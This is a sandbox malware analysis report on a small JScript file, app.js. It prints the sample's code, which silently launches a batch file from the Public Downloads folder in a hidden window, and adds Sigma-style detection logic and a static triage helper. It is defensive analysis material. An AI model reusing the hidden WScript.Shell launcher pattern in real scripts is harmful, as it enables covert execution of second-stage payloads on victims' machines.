Windows Analysis Report
app.js

Overview

General Information

Sample name:app.js
Analysis ID:1540522
MD5:4128e6986decef9a51c622cdf46ff040
SHA1:5c738033641d0faadf27480ad5e7175042a95c8b
SHA256:76274ad152d007e38e60e90f31af0cfaf90d8b54fa40232673c5b0512fb3a3af
Detection

Score: 56 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
Program does not show much activity (idle)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 7804 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\app.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

Sigma rule matches on process start (both rules fired on the same event):
  • Rule authors: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
  • Rule author: Michael Haag
  Matched event: Command / CommandLine / ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\app.js"; Image / NewProcessName / OriginalFileName: C:\Windows\System32\wscript.exe; ProcessName: wscript.exe; ProcessId: 7804; ParentProcessId: 4056; ParentCommandLine and ParentImage: empty in the report; CommandLine|base64offset|contains: empty
No Suricata rule has matched
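As an added illustration that is not part of the Joe Sandbox report, the matching logic behind the two Sigma hits above, re-implemented in JavaScript and run over constructed process-creation events (the first event mirrors the process start recorded in this report). The path and extension lists approximate the public rules, which carry more entries and exclusions; the event field names follow the Sigma process_creation fields quoted in the report.

```javascript
// Added example (not from the Joe Sandbox report): the matching logic behind the two
// Sigma hits above, re-implemented and run over constructed process-creation events.
// The lists below approximate the public rules (which carry more paths, extensions and
// exclusions); field names follow the Sigma process_creation fields quoted in the report.

const SCRIPT_HOSTS = ["\\wscript.exe", "\\cscript.exe"];
const SCRIPT_EXTS = [".js", ".jse", ".vbs", ".vbe", ".wsf", ".vba"];
const USER_WRITABLE = [":\\users\\", ":\\programdata\\", "\\windows\\temp\\", "\\appdata\\"];

const lower = s => (s || "").toLowerCase();

// Generic rule: a script host launched with a script file on its command line.
// Note the substring matching: ".js" also matches ".json", a known false-positive source.
function isScriptHostExec(evt) {
  const image = lower(evt.Image), cmd = lower(evt.CommandLine);
  return SCRIPT_HOSTS.some(h => image.endsWith(h)) && SCRIPT_EXTS.some(e => cmd.includes(e));
}

// Dropper variant: the same, but the script lives in a user-writable location.
function isScriptHostDropper(evt) {
  return isScriptHostExec(evt) && USER_WRITABLE.some(p => lower(evt.CommandLine).includes(p));
}

// Return the names of the rules an event would trigger.
function classify(evt) {
  const hits = [];
  if (isScriptHostExec(evt)) hits.push("WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript");
  if (isScriptHostDropper(evt)) hits.push("WScript or CScript Dropper");
  return hits;
}

// Constructed events: the first mirrors the process start recorded in this report; the
// second is a legitimate system script (only the generic rule fires); the third carries
// no script path at all.
const EVENTS = [
  { ProcessId: 7804, ParentProcessId: 4056, Image: "C:\\Windows\\System32\\wscript.exe",
    CommandLine: 'C:\\Windows\\System32\\WScript.exe "C:\\Users\\user\\Desktop\\app.js"' },
  { ProcessId: 1234, ParentProcessId: 100, Image: "C:\\Windows\\System32\\cscript.exe",
    CommandLine: "cscript.exe //nologo C:\\Windows\\System32\\slmgr.vbs /dlv" },
  { ProcessId: 5678, ParentProcessId: 100, Image: "C:\\Windows\\System32\\wscript.exe",
    CommandLine: "wscript.exe" },
];

for (const evt of EVENTS) {
  console.log(evt.ProcessId, classify(evt));
}
```

The second event shows why the generic rule alone is noisy on real fleets: any signed Windows maintenance script run through cscript.exe trips it, and the user-writable-path condition of the dropper rule is what separates app.js on the desktop from slmgr.vbs in System32.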

System Summary

All entries below are from C:\Windows\System32\wscript.exe unless stated otherwise.
  • COM object queried: Windows Script Host Shell Object, HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
  • Classification engine: classification label mal56.evad.winJS@1/0@0/0
  • File read: C:\Users\desktop.ini
  • Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (Software Restriction Policies lookup performed by the script host)
  • Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, scrrun.dll, mpr.dll, windows.storage.dll, propsys.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll (loaded twice), ntmarta.dll, wintypes.dll (loaded three times)
  • Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 (the JScript engine CLSID)
  • Automated click: OK (recorded twice)

Data Obfuscation

  • Anti Malware Scan Interface buffer (wscript.exe): CreateTextFile("Z:\syscalls\9431.js.csv"); ITextStream.WriteLine(" entry:4 f:"); ITextStream.WriteLine(" exec:7 f:"); IWshShell3._00000000(); ITextStream.WriteLine(" entry:43 o: f:Run a0:%22C%3A%5CUsers%5CPublic%5CDownloads%5Crun.bat%20C%3A%5CUsers%5CPublic%5CDownloads%5C%22 a1:0 a2:false"); IWshShell3.Run("C:\Users\Public\Downloads\run.bat C:\Users\Public\Downloads\", "0", "false")
    Reading note: the CreateTextFile and WriteLine calls against Z:\syscalls\ are the sandbox's own script-instrumentation trace (GSI is enabled for this run), not behaviour of app.js; the sample's own call is the final IWshShell3.Run. The URL-encoded a0 argument decodes to "C:\Users\Public\Downloads\run.bat C:\Users\Public\Downloads\"; a1:0 is the WshShell.Run window style (0 = hidden window) and a2:false means the script does not wait for the child process to exit.

Other behaviour signatures (wscript.exe unless stated otherwise; the category headings were lost in extraction):
  • Process information set: NOOPENFILEERRORBOX (recorded twice)
  • Window found: window name: WSH-Timer
  • All processes: thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
  • Binary or memory string in wscript.exe (00000000.00000002.1469710641.000001BF328D9000.00000004.00000020.00020000.00000000.sdmp): _VMware_
  • Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix

Techniques flagged for this sample, by tactic (the numbers are the signature-count badges as extracted; the remaining cells of the extracted matrix are the unflagged template entries and are omitted here):
  • Execution: Scripting (11)
  • Persistence: DLL Side-Loading (1)
  • Privilege Escalation: DLL Side-Loading (1)
  • Defense Evasion: Scripting (11), DLL Side-Loading (1)
  • Discovery: Security Software Discovery (1), File and Directory Discovery (1), System Information Discovery (2)
Source   Detection   Scanner         Label   Link
app.js   0%          ReversingLabs   -       -
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1540522
Start date and time:2024-10-23 21:23:52 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 2m 57s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (Javascript)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:app.js
Detection:MAL
Classification:mal56.evad.winJS@1/0@0/0
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .js
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • VT rate limit hit for: app.js
No simulations
No context
No created / dropped files found
File type: Unicode text, UTF-8 text, with CRLF line terminators
Entropy (8bit): 4.410584697662754
TrID:
File name: app.js
File size: 387 bytes
MD5: 4128e6986decef9a51c622cdf46ff040
SHA1: 5c738033641d0faadf27480ad5e7175042a95c8b
SHA256: 76274ad152d007e38e60e90f31af0cfaf90d8b54fa40232673c5b0512fb3a3af
SHA512: 2d4bb4220b4dc1404f00a21a58c37c8edc74645ec240b18a073c91c491ae265dac47cee92669b93afdcb55c11d0ddd5c7411b99fc566f53764187137ce17df84
SSDEEP: 12:2sK1OjDBpVEa47BiVFg+JfN2zp48WfuG/4:2sK1OjDBbEa41iVFgEfNyW2s4
TLSH: 26E0860DEE4DA5956C36F3A9AB3B010DF9D201A31650D656784CB1905F7055801BDFF6
File Content Preview: (function() {.. var a = "C:\\Users\\Public\\Downloads\\";.. var b = a + "run.bat";.. var c = a + "";.. var d = "WScript.Shell";.. var e = "...... ......: ";.... try {.. var f = new ActiveXObject(d);.. if (f) {..
  (the ".." pairs are the CRLF line terminators; the two runs of six dots are the twelve UTF-8 bytes of the two Arabic words assigned to e, which the preview cannot print, see the script listing below)
Icon Hash: 68d69b8bb6aa9a86
No network behavior found

    Target ID:0
    Start time:15:24:55
    Start date:23/10/2024
    Path:C:\Windows\System32\wscript.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\app.js"
    Imagebase:0x7ff6328c0000
    File size:170'496 bytes
    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

Call Graph (graph image not reproduced; nodes and edges as extracted): entry → anonymous function; anonymous function → Run; anonymous function → error; ActiveXObject()

Script (reconstructed from the instrumented listing; GSI call results are shown as trailing comments):

    (function() {
        var a = "C:\\Users\\Public\\Downloads\\";
        var b = a + "run.bat";
        var c = a + "";
        var d = "WScript.Shell";
        var e = "حدث خطأ: ";                 // Arabic, "An error occurred: "; the instrumented listing rendered these characters as \x062d\x062f\x062b \x062e\x0637\x0623, the file itself holds them as UTF-8
        try {
            var f = new ActiveXObject(d);    // Windows Script Host Shell Object, CLSID {72C24DD5-D70A-438B-8A42-98424B88AFB8} in the System Summary
            if (f) {
                f.Run(b + " " + c, 0, false);  // GSI: Run("C:\Users\Public\Downloads\run.bat C:\Users\Public\Downloads\", 0, false) ➔ undefined
            } else {
            }
        } catch (g) {
            console.error(e + g.message);
        }
    })();                                    // GSI: () ➔ undefined

Analyst notes: Run() is invoked with window style 0 (hidden) and bWaitOnReturn false, and passes the Downloads directory to run.bat as its first argument. run.bat was not supplied with the sample and nothing was dropped or fetched during the analysis, so the second stage is not observed here; the file is a launcher for a batch script that must already be in C:\Users\Public\Downloads\. Note also that console is not defined in the WSH JScript host, so if Run() throws (for example because run.bat is missing) the catch handler itself fails with an "Object expected" error; wscript.exe reports unhandled script errors in a modal dialog, which fits the "error" node in the call graph and the automated OK clicks recorded in the System Summary.
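The following is an added example (Node.js) and is not part of the Joe Sandbox report or of the sample: a small static triage helper for WSH droppers of this shape. It resolves the constant string assignments and "+" concatenations, decodes the escape sequences a JScript literal may contain, and flags ActiveXObject("WScript.Shell").Run(...) calls with a hidden window, without executing the script. The regex-based parsing is limited to the `var x = ...;` and `obj.Run(...)` patterns seen in app.js (an assumption, not a general JScript parser); the embedded sample text is a constructed copy of the listing above with the Arabic string written as \u escapes.

```javascript
// Added example (not from the report or the sample): static triage of a WSH dropper.
// Parsing is regex-based and limited to the `var x = <const>;` and `obj.Run(...)`
// shapes seen in app.js (an assumption); nothing here executes the script.

// Constructed copy of the sample as listed in the report (Arabic string as \u escapes).
const SAMPLE = String.raw`(function() {
  var a = "C:\\Users\\Public\\Downloads\\";
  var b = a + "run.bat";
  var c = a + "";
  var d = "WScript.Shell";
  var e = "\u062d\u062f\u062b \u062e\u0637\u0623: ";
  try {
    var f = new ActiveXObject(d);
    if (f) {
      f.Run(b + " " + c, 0, false);
    } else {
    }
  } catch (g) {
    console.error(e + g.message);
  }
})();`;

// Split `s` on `sep` characters that lie outside string literals.
function splitOutside(s, sep) {
  const parts = [];
  let cur = "", quote = null;
  for (let i = 0; i < s.length; i++) {
    const ch = s[i];
    if (quote) {
      cur += ch;
      if (ch === "\\" && i + 1 < s.length) cur += s[++i];   // keep escaped char verbatim
      else if (ch === quote) quote = null;
    } else if (ch === '"' || ch === "'") { quote = ch; cur += ch; }
    else if (ch === sep) { parts.push(cur.trim()); cur = ""; }
    else cur += ch;
  }
  parts.push(cur.trim());
  return parts;
}

const LITERAL = /^"((?:[^"\\]|\\.)*)"$|^'((?:[^'\\]|\\.)*)'$/;

// Decode \uXXXX, \xXX and single-character escapes of a JScript string literal body.
function unescapeLiteral(body) {
  return body.replace(/\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|\\(.)/g, (m, u, x, c) => {
    if (u) return String.fromCharCode(parseInt(u, 16));
    if (x) return String.fromCharCode(parseInt(x, 16));
    return { n: "\n", r: "\r", t: "\t", "0": "\0" }[c] ?? c;
  });
}

// Evaluate `lit + var + lit ...` where every term is a literal or a known constant;
// returns null if any term is something else (a call, an object, ...).
function evalConst(expr, vars) {
  let out = "";
  for (const t of splitOutside(expr, "+")) {
    const lit = t.match(LITERAL);
    if (lit) out += unescapeLiteral(lit[1] ?? lit[2] ?? "");
    else if (vars.has(t)) out += vars.get(t);
    else return null;
  }
  return out;
}

// Collect every `var name = <constant expression>;` in source order.
function resolveConstants(src) {
  const vars = new Map();
  const decl = /var\s+([A-Za-z_$][\w$]*)\s*=\s*([^;]+);/g;
  let m;
  while ((m = decl.exec(src)) !== null) {
    const v = evalConst(m[2], vars);
    if (v !== null) vars.set(m[1], v);
  }
  return vars;
}

// Report WScript.Shell instantiation and every .Run(...) with resolved arguments.
function triage(src) {
  const vars = resolveConstants(src);
  const out = { strings: Object.fromEntries(vars), shellObjectVar: null, runs: [] };
  const ax = /var\s+([A-Za-z_$][\w$]*)\s*=\s*new\s+ActiveXObject\s*\(([^)]*)\)/g;
  let m;
  while ((m = ax.exec(src)) !== null) {
    const progId = evalConst(m[2], vars);
    if (progId && progId.toLowerCase() === "wscript.shell") out.shellObjectVar = m[1];
  }
  const run = /([A-Za-z_$][\w$]*)\s*\.\s*Run\s*\(([^)]*)\)/g;
  while ((m = run.exec(src)) !== null) {
    const args = splitOutside(m[2], ",");
    out.runs.push({
      object: m[1],
      viaWScriptShell: m[1] === out.shellObjectVar,
      command: evalConst(args[0] ?? '""', vars),
      hiddenWindow: (args[1] ?? "").trim() === "0",   // WshShell.Run window style 0 = hidden
      waitOnReturn: (args[2] ?? "").trim() === "true",
    });
  }
  return out;
}

console.log(JSON.stringify(triage(SAMPLE), null, 2));
```

On the sample above the helper reports the ProgID passed through variable d as WScript.Shell, the resolved command line "C:\Users\Public\Downloads\run.bat C:\Users\Public\Downloads\" with a hidden window, and the decoded error prefix, which is the same information the sandbox recovered dynamically through GSI and AMSI, obtained here without running the script.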